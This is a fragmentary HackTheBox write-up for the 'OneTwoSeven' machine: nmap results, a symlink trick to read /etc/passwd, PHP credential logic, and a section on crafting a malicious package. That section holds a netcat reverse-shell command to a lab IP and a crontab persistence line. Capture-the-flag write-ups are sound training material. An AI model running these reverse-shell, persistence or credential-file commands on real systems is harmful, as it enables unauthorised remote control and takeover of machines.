OneTwoSeven — HackTheBox Machine Writeup

First HackTheBox Machine Writeup!

Reconnaisance

Nmap scan report for 10.10.10.133
Host is up (0.31s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
| 256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
|_ 256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Page moved.
60080/tcp filtered unknown
SFTP? So that explains the open port 22
ooh. nifty!
featuring a wall

Enumeration

ln -s /etc/passwd passwd_ln
ots-yODc2NGQ:x:999:999:127.0.0.1:/home/web/ots-yODc2NGQ:/bin/false
ots-3YzMyNDk:x:1001:1001:10.10.x.x:/home/web/ots-3YzMyNDk:/bin/false
...
<?php
function username() { $ip = $_SERVER['REMOTE_ADDR']; return "ots-" . substr(str_replace('=','',base64_encode(substr(md5($ip),0,8))),3); }
function password() { $ip = $_SERVER['REMOTE_ADDR']; return substr(md5($ip),0,8); }
?>
...

USER.TXT

...
if ($_POST['username'] == 'ots-admin' && hash('sha256',$_POST['password']) == '11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8') {
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
...
<?php session_start(); if (isset ($_SESSION['username'])) { header("Location: /menu.php"); } ?>
<?php if ( $_SERVER['SERVER_PORT'] != 60080 ) { die(); } ?>
127.0.0.1/addons/ots-man-addon.php/addon-upload.php
127.0.0.1/addons/ots-man-addon.php/addons/ots-man-addon.php 
127.0.0.1/addon-download.php/addon-upload.php
127.0.0.1/addons/ots-man-addon.php/addon-upload.php
/usr/bin/apt-get update
/usr/bin/apt-get upgrade

Weaponization

MITM Setup

Crafting the Evil Package

#!/bin/bash
nc -e /bin/bash 10.10.14.48 7070
crontab -l | { cat; echo “* * * * * /usr/sbin/nano_update “; } | crontab -
nc -e /bin/bash 10.10.14.48 7070

Delivery + Exploitation

ROOT.TXT

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store